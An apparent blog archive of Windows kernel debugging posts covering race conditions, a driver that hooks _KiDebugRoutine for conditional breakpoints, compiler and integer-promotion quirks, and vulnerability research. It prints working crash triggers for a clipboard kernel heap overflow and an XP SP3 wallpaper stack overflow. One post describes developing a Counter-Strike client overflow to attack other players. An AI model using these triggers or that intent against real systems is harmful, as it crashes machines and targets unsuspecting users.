Archive for the ‘Debugging’ Category

Heapos Forever

Friday, August 6th, 2010

There are still hippos around us, beware:
heapo

Kernel heap overflow.

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);


[Update, 11th Aug]: Here is MSRC response.

Custom Kernel Debugging is Faster

Tuesday, July 20th, 2010

When you start to write a post you always get a problem with the headline for the post. You need to find something that will, in a few words, sum it up for the reader. I was wondering which one is better, “Boosting WinDbg”, “Faster Kernel Debugging in WinDbg”, “Hacking WinDbg” and so on. But they might be not accurate, and once you will read the post you won’t find them appropriate. But instead of talking about meta-post issues, let’s get going.

Two posts ago, I was talking about hunting a specific race condition bug we had in some software I work on. At last, I have free time to write this post and get into some interesting details about Windows Kernel and Debugging.

First I want to say that I got really pissed off that I couldn’t hunt the bug we had in the software like a normal human being, that Jond and I had to do it the lame old school way, which takes more time, lots of time. What really bothered me is that computers are fast and so is debugging, at least, should be. Why the heck do I have to sit down in front of the computer, not mentioning – trying to dupe the damned bug, and only then manage to debug it and see what’s going on wrong. Unacceptable. You might say, write a better code in the first place, I agree, but even then people have bugs, and will have, forever, and I was called to simply help.

Suppose we want to set a breakpoint on memory access this time, but something more complicated with conditions. The reason we need a condition, rather than a normal breakpoint is because the memory we want to monitor gets accessed thousands times per second, in my case with the race condition, for instance.
You’re even welcome to make the following test locally on your computer, fire up Visual Studio, and test the following code: unsigned int counter = 1; while (counter < 99999999+1) { counter++; }, set a memory access breakpoint on counter which stops when hit count reach 99999999, and time the whole process, and then time it without the bp set, and compare the result, what's the ratio you got? Isn't that just crazy?

Here's an example in WinDbg's syntax, would be something like this:
ba w4 0x491004 "j (poi(0x491004)==0) 'gc'"
Which reads: break on write access for an integer at address 0x491004 only if its value is 0, otherwise continue execution.

It will be tens-thousands times faster without the bp set, hence the debugging infrastructure, even locally (usermode), is slowing things down seriously.
And think that you want to debug something similar on a remote machine, it's impossible, you are going to wait years in vain for something to happen on that machine. Think of all the COM/Pipe/USB/whatever-protocol messages that have to be transmitted back and forth the debugged machine to the debugger. And add to that the conditional breakpoint we set, someone has to see whether the condition is true or false and continue execution accordingly. And even if you use great tools like VirtualKD.

Suppose you set a breakpoint on a given address, what really happens once the processor executes the instruction at that address? Obviously a lot, but I am going to talk about Windows Kernel point of view.
Let's start bottom up, Interrupt #3 is being raised by the processor which ran that thread, which halts execution of the thread and transfers control _KiTrap3 in ntoskrnl. _KiTrap3 will build a context for the trapped thread, with all registers and this likely info and call CommonDispatchException with code 0x80000003 (to denote a breakpoint exception). Since the 'exception-raising' is common, everybody uses it, in other exceptions as well. CommonDispatchException calls _KiDispatchException. And _KiDispatchException is really the brain behind all the Windows-Exception mechanism. I'm not going to cover normal exception handling in Windows, which is very interesting in its own. So far nothing is new here. But we're getting to this function because it has something to do with debugging, it checks whether the _KdDebuggerEnabled is set and eventually it will call _KiDebugRoutine if it's set as well. Note that _KiDebugRoutine is a pointer to a function that gets set when the machine is debug-enabled. This is where we are going to get into business later, so as you can see the kernel has some minimal infrastructure to support kernel debugging with lots of functionality, many functions in ntoskrnl which start in "kdp", like KdpReadPhysicalMemory, KdpSetContext and many others. Eventually the controlling machine that uses WinDbg, has to speak to the remote machine using some protocol named KdCom, there's a KDCOM.DLL which is responsible for all of it.

Now, once we set a breakpoint in WinDbg, I don't know exactly what happens, but I guess it’s something like this: it stores the bp in some internal table locally, then sends it to the debugged machine using this KdCom protocol, the other machine receives the command and sets the breakpoint locally. Then when the bp occurs, eventually WinDbg gets an event that describes the debug event from the other machine. Then it needs to know what to do with this bp according to the dude who debugs the machine. So much going on for what looks like a simple breakpoint. The process is very similar for single stepping as well, though sending a different exception code.

The problem with conditional breakpoints is that they are being tested for the condition locally, on the WinDbg machine, not on the server, so to speak. I agree it’s a fine design for Windows, after all, Windows wasn’t meant to be an uber debugging infrastructure, but an operating system. So having a kernel debugging builtin we should say thanks… So no complaints on the design, and yet something has to be done.

Custom Debugging to our call!

That’s the reason I decided to describe above how the debugging mechanism works in the kernel, so we know where we can intervene that process and do something useful. Since we want to do smart debugging, we have to use conditional breakpoints, otherwise in critical variables that get touched every now and then, we will have to hit F5 (‘go’) all the time, and the application we are debugging won’t get time to process. That’s clear. Next thing we realized is that the condition tests are being done locally on our machine, the one that runs WinDbg. That’s not ok, here’s the trick:
I wrote a driver that replaces (hooks) the _KiDebugRoutine with my own function, which checks for the exception code, then examines the context according to my condition and only then sends the event to WinDbg on the other machine, or simply “continues-execution”, thus the whole technique happens on the debugged machine without sending a single message outside (regarding the bp we set), unless that condition is true, and that’s why everything is thousands of times or so faster, which is now acceptable and usable. Luckily, we only need to replace a pointer to a function and using very simple tests we get the ability to filter exceptions on spot. Although we need to get our hands dirty with touching Debug-Registers and the context of the trapping thread, but that’s a win, after all.

Here’s the debug routine I used to experiment this issue (using constants tough):

int __stdcall my_debug(IN PVOID TrapFrame,
        IN PVOID Reserved,
        IN PEXCEPTION_RECORD ExceptionRecord,
        IN PCONTEXT Context,
        IN KPROCESSOR_MODE PreviousMode,
        IN UCHAR LastChance)
{
        ULONG _dr6, _dr0;
        __asm {
                mov eax, dr6
                mov _dr6, eax
                mov eax, dr0
                mov _dr0, eax
        };
        if ((ExceptionRecord->ExceptionCode == 0×80000003) &&
                (_dr6 & 0xf) &&
                (_dr0 == MY_WANTED_POINTER) &&
                (ExceptionRecord->ExceptionAddress != MY_WANTED_EIP))
        {
                return 1;
        }
        return old_debug_routine(TrapFrame, Reserved, ExceptionRecord, Context, PreviousMode, LastChance);
}
 

This routine checks when a breakpoint interrupt happened and stops the thread only if the pointer I wanted to monitor was accessed from a given address, else it would resume running that thread. This is where you go custom, and write whatever crazy condition you are up to. Using up to 4 breakpoints, that’s the processor limit for hardware breakpoints. Also checking out which thread or process trapped, etc. using the Kernel APIs… It just reminds me “compiled sprites” :)

I was assuming that there’s only one bp set on the machine which is the one I set through WinDbg, though this time, there was no necessity to set a conditional breakpoint in WinDbg itself, since we filter them using our own routine, and once WinDbg gets the event it will stop and let us act.

For some reason I had a problem with accessing the DRs from the Context structure, I didn’t try too hard, so I just backed to use them directly because I can.

Of course, doing what I did is not anything close to production quality, it was only a proof of concept, and it worked well. Next time that I will find myself in a weird bug hunting, I will know that I can draw this weapon.
I’m not sure how many people are interested in such things, but I thought it might help someone out there, I wish one day someone would write an open source WinDbg plugin that injects kernel code through WinDbg to the debugged machine that sets this routine with its custom runtime conditional breakpoints :)

I really wanted to paint some stupid pictures that show what’s going on between the two machines and everything, but my capabilities at doing that are aweful, so it’s up to you to imagine that, sorry.

For more related information you can see:
http://uninformed.org/index.cgi?v=8&a=2&p=16
http://www.vsj.co.uk/articles/display.asp?id=265

Ending The Race (Condition)

Friday, April 23rd, 2010

After talking to my co-worker, Jond, he agreed that I will write about him too. Actually we were working on solving that race condition together.
So everything I told you in the last post was in a timeline of around 15 hours, almost consecutive, where Jond and I were debugging the system and trying to track down the bass-turd. So it was around 6 am in the morning, after we had a few hooks on the critsec acquire and leave functions in the kernel. But the log looked fine and this is where I decided to call it a night and went home to sleep a bit. Jond decided to continue, the problem with us, is that we take bugs personally. So he got the logs better and wrote some Python script to analyze it. I was too lazy to do that earlier, I decided to analyze manually once, it is the excuse that if we do it only once, writing a script might take longer. I was wrong. Pity. Then, according to Jond’s story, he actually saw something wrong in the log, at f@cking last. So I’m not sure about the small details, but he noticed that the critsec was entered twice or something imaginary like that from different threads, obvisouly. And that time he knew he nailed the guy down.

There are not many options, once you see that the other ‘waiters’ don’t wait when some guy holds it, right? So he looked at the code again, and yet it looked fine! Now he decided it’s time to act upon “WTF is going on”, and he did the following experiment, trying to acquire the critsec in a loop (he didn’t really need a loop, but after you’re going insane… so he had to write something that totally looks like “I GOT THE CRIT” – or not). And to his surprise other threads continued to work normally as if there was no lock. As if huh. Soooo, this is going to be embarrassing a bit. And then he found out that the call to the critsec acquire function wasn’t correct. It was missing a dereference to a pointer. A single character, you got it right. To make it clearer, he saw something like Enter-Crit (m_ptr), instead of Enter-Crit(*m_ptr), which is a pointer to a pointer of an ERESOURCE.
So obviously, the the lock wasn’t acquired at all, for some odd reason it aligned well in the logs we analyzed together, until he improved the logs and found a quirk. A question I asked myself, after we knew what was the bug, is that we gave it some garbage pointer, instead of an ERESOURCE, so the function obviously failed all the times we called it. But how come we didn’t think of testing the return value even though we knew the lock didn’t work? I guess it has something to do that nobody ever checks the return value of “acquire” crit-sec, even in MS code… Bad practice? Not sure, what can you do if you want the lock, and can’t get it? It means one thing, that you have a bug, otherwise it should wait on the lock… So it’s the kind of stuff nobody checks anyway, but maybe a line of ASSERT could help. Oh well, next time.

That was it, kinda nasty, it always come down to something stupid at the end, no? :(
Now it leaves me totally with that breakpoint we couldn’t do because the system was too slow with it, and I will write about it next week.
See you then.

Race Condition From Hell, aren’t they all?

Monday, April 19th, 2010

Actually I had a trouble to come up with a good title for this post, at least one that I was satisfied with. Therefore I will start with a background story, as always.
The problem started when I had to debug a huge software which was mostly in Kernel mode. And there was this critical section (critsec from now on) synchronization object that wasn’t held always correctly. And eventually after 20 mins of trying to replicate the bug, we managed to crash the system with a NULL dereference. This variable was a global that everybody who after acquiring the critsec was its owner. Then how come we got a crash ? Simple, someone was touching the global out of it critsec scope. That’s why it was also very hard to replicate, or took very long.

The pseudo code was something like this:
Acquire Crit-Sec
g_ptr = “some structure we use”
do safe task with g_ptr

g_ptr = NULL
Release Crit-Sec

So you see, before the critsec was released the global pointer was NULLed again. Obvisouly this is totally fine, because it’s still in the scope of the acquired crit, so we can access it safely.

Looking at the crash dumps, we saw a very weird thing, but nothing surprising for those race conditions bugs. Also if you ask me, I think I would prefer dead-lock bugs to race conditions, since in dead lock, everything gets stuck and then you can examine which locks are held, and see why some thread (out of the two) is trying to acquire the lock, when it surely can’t… Not saying it’s easier, though.
Anyway, back to the crash dump, we saw that the g_ptr variable was accessed in some internal function after the critsec was acquired. So far so good. Then after a few instructions, in an inner function that referenced the variable again, suddenly it crashed. Traversing back to the point where we know by the disassembly listing of the function, where the g_ptr was touched first, we knew it worked there. Cause otherwise, it would have crashed there and then, before going on, right? I have to mention that between first time reading the variable and the second one where it crashed, we didn’t see any function calls.
This really freaked me out, because the conclusion was one – somebody else is tempering with our g_ptr in a different thread without locking the crit. If there were any function calls, might be that some of them, caused our thread to be in a Waitable state, which means we could accept APCs or other events, and then it could lead to a whole new execution path, that was hidden from the crash dump, which somehow zeroed the g_ptr variable. Also at the time of the crash, it’s important to note that the owner of the critsec was the crashing thread, no leads then to other problematic threads…

Next thing was to see that everybody touches the g_ptr only when the critsec is acquired. We surely know for now that someone is doing something very badly and we need to track the biatch down. Also we know the value that is written to the g_ptr variable is zero, so it limits the number of occurrences of such instruction (expression), which lead to two spots. Looking at both spots, everything looked fine. Of course, it looked fine, otherwise I would have spotted the bug easily, besides, we got a crash, which means, nothing is fine. Also, it’s time to admit, that part of the code was Windows itself, which made the problem a few times harder, because I couldn’t do whatever I wanted with it.

I don’t know how you guys would approach such a problem in order to solve it. But I had three ideas. Sometimes just like printf/OutputDebugPrint is your best friend, print logs when the critsec is acquired and released, who is waiting for it and just every piece of information we can gather about it. Mind you that part of it was Windows kernel itself, so we had to patch those functions too, to see, who’s acquiring the critsec and when. Luckily in debug mode, patchguard is down :) Otherwise, it would be bloody around the kernel. So looking at the log, everything was fine, again, damn. You can stare at the god damned thing for hours and tracking the acquiring and releasing pairs of the critsec, and nothing is wrong. So it means, this is not going to be the savior.

The second idea, was to comment out some code portions with #if 0 surrouding the potential problematic code. And starting to eliminate the possibilities of which function is the cause of this bug. This is not such a great idea. Since a race condition can happen in a few places, finding one of them is not enough usually. Though it can teach you something about the original bug’s characteristics, then you can look at the rest of the code to fix that same thing. It’s really old school technique but sometimes it is of a help as bad as it sounds. So guess what we did? Patched the g_ptr = NULL of the kernel and then everything went smooth, no crashes and nothing. But the problem still was around, now we knew for sure it’s our bug and not MS, duh. And there were only a few places in our code which set this g_ptr. Looking at all of them, again, seemed fine. This is where I started going crazy, seriously.

While you were reading the above ideas, didn’t you come up with the most banal idea, to put a dumb breakpoint – on memory access, on g_ptr with a condition of “who writes zero”. Of course you did, that what you should have done in the first place. I hope you know that. Why we couldn’t do that?
Because the breakpoint was fired tens of thousands times in a single second. Rendering the whole system almost to freeze. Assuming it took us 20 mins to replicate the bug, when we heavily loaded the system. Doing that with such a breakpoint set, would take days or so, no kidding. Which is out of question.

This will lead me to the next post. Stay tuned.

Trying to Pwn Stuff my way

Saturday, January 30th, 2010

I have been playing CS since 2001 :) Kinda addicted I can say. Like, after I had been in South America for half a year, suddenly I caught myself thinking “ohhh I wish I could play CS”… So I think it means I’m addicted. Anyway I really like that game. A few days ago I was playing on some server and suddenly hl2 crashed. How good is that they generate a crash dump automatically, so I fired up WinDbg and took a look what happened, I found out that some pointer was set to 1, not NULL, mind you. Looking around the crash area I found a buffer overflow on the stack, but only for booleans, so I don’t know what was the point and how it was triggered or who sent it (server or another player). Anyway, since I like this game so much, there is only one thing I don’t like it, the stupid children you play with/against, they curse and TK (team-kill) like noobs. One day I promised to myself that I will pwn those little bastards. Therefore I started to investigate this area of crash, which I won’t say anything about the technical details here, so you won’t be able to replicate it, except that I found a stack buffer overflow. The way from there to pwn the clients who connect to a server I set up is really easy. The down side is that they have to connect to a server I control, which is quite lame, the point is to pwn other players on a remote server, so I still work on that. For me pwning would be to find a way to kick them from the server for instance, I don’t need to execute code on their machines. Besides since I do everything for fun, and I’m not a criminal, I have to mention that it’s for eductional purposes only :) Being the good guy I am, in ZERT and stuff. I just wanted to add that the protocol used to be really hole-y before CS: Source came out, everything was vulnerable, really, you could tell the server that you wanted to upload a file to it (your spray-decal file) with a name longer than 256 characters, and bam, you own the server through a stupid strcpy to a buffer on the stack. But after CSS came out, the guys did a great job and I could hardly find stuff. What I found is in some isoteric parser that the input comes from the server… What was weird is that some functions were protected with a security cookie and some weren’t. I don’t know what configuration those guys use to compile the game, but they surely need to work it out better.

Another thing I’ve been trying to pwn for a long time now, without much success, I have to say, is NTVDM. This piece of software is huge, though most of it is mostly in user-mode, there are lots of related code in kernel. Recently a very crazy bug was found there (which can lead to a privilege escalation), something in the design, of how the kernel transfers control to BIOS code and returns. You can read more here to get a better clue. So it gave me some idea what to do about some potential buggy code I found. Suppose I found a code in the kernel that takes DS:SI and changes it to a flat pointer, the calculation is (DS << 4) + SI. The thing is that DS is 16 bits only. The thing I thought is that with some wizardy I will be able to change DS to have some value above 0xffff. For some of you it might sound impossible, but in 32 bits and playing with pop ds, mov ds, ax and the like, I managed to put random values in the high 16 bits of DS (say it’s a 32 bit segment register). Though I don’t know if WinDbg showed me garbage or how it really worked, or what happened there, I surely saw big values in DS. So since I couldn’t reproduce this behavior in 16 bits under NTVDM, I tried to think of a way to set DS in the VDM Context itself. If you look at the exports of NTVDM you will see a function named “SetDS”, so taking a look of how it works I tried to use it inside my 16 bits code (exploiting some Escape bug I found myself and posted on this blog earlier), I could set DS to whatever arbitary value I wanted. Mind you, I set DS for the VM itself, not the DS of the usermode application of ntvdm.exe. And then I tried to trigger the other part in the kernel which takes my raw pointer and tries to write to it, but DS high 16 bits were zeros. Damn it. Then I gave to it more thought, and understood that what I did is not good enough. This is because once I set DS to some value, then I get to code to execute on the processor for real and then it enters kernel’s trap handler, DS high half gets truncated once again and I lost in the game. So I’m still thinking if it’s spossible. Maybe next step I should try is to invoke the kernel’s trap handler directly with DS set to whatever value I want, but that’s probably not possible since I can’t control the trap frame myself… or maybe I can ;)

Optimize My Index Yo

Thursday, November 26th, 2009

I happened to work with UNICODE_STRING recently for some kernel stuff. That simple structure is similar to pascal strings in a way, you got the length and the string doesn’t have to be null terminated, the length though, is stored in bytes. Normally I don’t look at the assembly listing of the application I compile, but when you get to debug it you get to see the code the compiler generated. Since some of my functions use strings for input but as null terminated ones, I had to copy the original string to my own copy and add the null character myself. And now that I think of it, I will rewrite everything to use lengths, I don’t like extra wcslen’s. :)

Here is a simple usage case:

p = (PWCHAR)ExAllocatePool(SomePool, Str->Length + sizeof(WCHAR));
if (p == NULL) return STATUS_NO_MEMORY;
memcpy(p, Str->buffer, Str->Length);
p[Str->Length / sizeof(WCHAR)] = UNICODE_NULL;

I will show you the resulting assembly code, so you can judge yourself:

shr    esi,1
xor    ecx,ecx
mov  word ptr [edi+esi*2],cx

One time the compiler converts the length to WCHAR units, as I asked. Then it realizes it should take that value and use it as an index into the unicode string, thus it has to multiply the index by two, to get to the correct offset. It’s a waste-y.
This is the output of a fully optimized code by VS08, shame.

It’s silly, but this would generate what we really want:

*(PWCHAR)((PWCHAR)p + Str->Length) = UNICODE_NULL;

With this fix, this time without the extra div/mul. I just did a few more tests and it seems the dead-code removal and the simplifier algorithms are not perfect with doing some divisions inside the indexing for pointers.

Update: Thanks to commenter Roee Shenberg, it is now clear why the compiler does this extra shr/mul. The reason is that the compiler can’t know whether the length is odd, thus it has to round it.

A BSWAP Issue

Saturday, November 7th, 2009

The BSWAP instruction is very handy when you want to convert a big endian value to a little endian value and vice versa. Instead of reversing the bytes yourself with a few moves (or shifts, depends how you implement it), a single instruction will do it as simple as that. It personally reminds me something like the HTONS (and friends) in socket programming. The instruction supports 32 bits and 64 bits registers. It will swap (reverse) all bytes inside correspondingly. But it won’t work for 16 bits registers. The documentation says the result is undefined. Now WTF, what was the issue to support 16 bits registers, seriously? That’s a children’s game for Intel, but instead it’s documented to be undefined result. I really love those undefined results, NOT.
When decoding a stream in diStorm in 16 bits decoding mode, BSWAP still shows the registers as 32 bits. Which, I agree can be misleading and I should change it (next ver). Intel decided that this instruction won’t support 16 bits registers, and yet it will stay a legal instruction, rather than, say, raising an exception of undefined instruction, there are known cases already when a specific destination register can cause to an undefined instruction exception, like MOV CR5, EAX, etc. It’s true that it’s a bit different (because it’s not the register index but the decoding mode), but I guess it was easier for them to keep it defined and behave weird. When I think of it again, there are some instruction that don’t work in 64 bits, like LDS. Maybe it was before they wanted to break backward compatibility… So now I keep on getting emails to fix diStorm to support BSWAP for 16 bits registers, which is really dumb. And I have to admit that I don’t like this whole instruction in 16 bits, because it’s really confusing, and doesn’t give a true result. So what’s the point?

I was wondering whether those people who sent me emails regarding this issue were writing the code themselves or they were feeding diStorm with some existing code. The question is how come nobody saw it doesn’t work well for 16 bits? And what’s the deal with XCHG AH, AL, that’s an equal for BSWAP AX, which should work 100%. Actually I can’t remember whether compilers generate code that uses BSWAP, but I am sure I have seen the instruction being used with normal 32 bits registers, of course.

Integer Promotion is Dodgey & Dangerous

Wednesday, October 28th, 2009

I know this subject and every time it surprises me again. Even if you know the rules of how it works and you read K&R, it will still confuse you and you will end up being wrong in some cases. At least, that’s what happened to me. So I decided to mention the subject and to give two examples along.

Integer promotions probably happen in your code so many times, and most of us are not even aware of that fact and don’t understand the way it works. To those of you who have no idea what integer promotion is, to make a long story short: “Objects of an integral type can be converted to another wider integral type (that is, a type that can represent a larger set of values). This widening type of conversion is called “integral promotion.”, cited by MSDN. Why? So calculation can be faster in some of the times, otherwise because of different types; so seamless conversions happen, etc. There are exact rules in the standard how it works and when, you should check it out on your own

enum {foo_a = -1, foo_b} foo_t;

unsigned int a = -1;
printf("%s", a == foo_a ? "true" : "false");

Can you tell what it prints?
It will print “true”. Nothing special right, just works as we expect?
Check the next one out:

unsigned char a = -1;
printf("%s", a == foo_a ? "true" : "false");

And this time? This one will result in “false”. Only because the type of ‘a’ is unsigned. Therefore it will be promoted to unsigned integer – 0×000000ff, and compare it to 0xffffffff, which will yield false, of course.
If ‘a’ were defined as signed, it would be ok, since the integer promotions would make sure to sign extend it.

Another simple case:

unsigned char a = 5, b = 200;
unsigned int c = a * b;
printf("%d", c);

Any idea what the result is? I would expect it to be (200*5) & 0xff – aka the low byte of the result, since we multiply uchars here, and you? But then I would be wrong as well. The result is 1000, you know why? … Integer Promotions, ta da. It’s not like c = (unsigned char)(a * b); And there is what confusing sometimes.
Let’s see some Assembly then:

movzx       eax,byte ptr [a]
movzx       ecx,byte ptr [b]
imul        eax,ecx
mov         dword ptr [c],eax

Nasty, the unsigned char variables are promoted to unsigned int. Then the multiplication happens in 32 bits operand size! And then the result is not being truncated, just like that, to unsigned char again.

Why is it dangerous? I think the answer is obvious.. you trivially expect for one result when you read/write the code, but in reality something different happens. Then you end up with a small piece of code that doesn’t do what you expect it to. And then you end up with some integer overflow vulnerability without slightly noticing. Ouch.

Update: Thanks to Daniel I changed my erroneous (second) example to what I really had in mind when I wrote this post.

VML + ANI ZERT Patches

Tuesday, February 3rd, 2009

It is time to release an old presentation about the VML and ANI vulnerabilities that were patched by ZERT. It explains the vulnerabilities and how they were closed. It is somewhat very technical, Assembly is required if you wanna really enjoy it. I also gave a talk using this presentation in CCC 2007. It so happened that I wrote the patches, with the extensive help of the team, of course.

ZERT Patches.ppt

Oh No, My XPSP3

Monday, February 2nd, 2009
#include <windows.h>
int main()
{
 WCHAR c[1000] = {0};
 memset(c, ‘c’, 1000);
 SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);

 WCHAR b[1000] = {0};
 SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
 return 0;
}

Two posts ago I talked about vulnerabilities. So here’s some Zero Day. This will crash your system, unless you’re on Vista (which is already immune to it). And why the heck on SP3 we are still having this thing not closed yet?

It might be exploitable, I didn’t research it any further than the BSOD of the security cookie…Maybe on some compilations without /GS it can be easily exploited. Or maybe overriding enough of the stack to trigger an exception could be it.

“Remember to let her into your heart,
Then you can start to make it better” – The Beatles.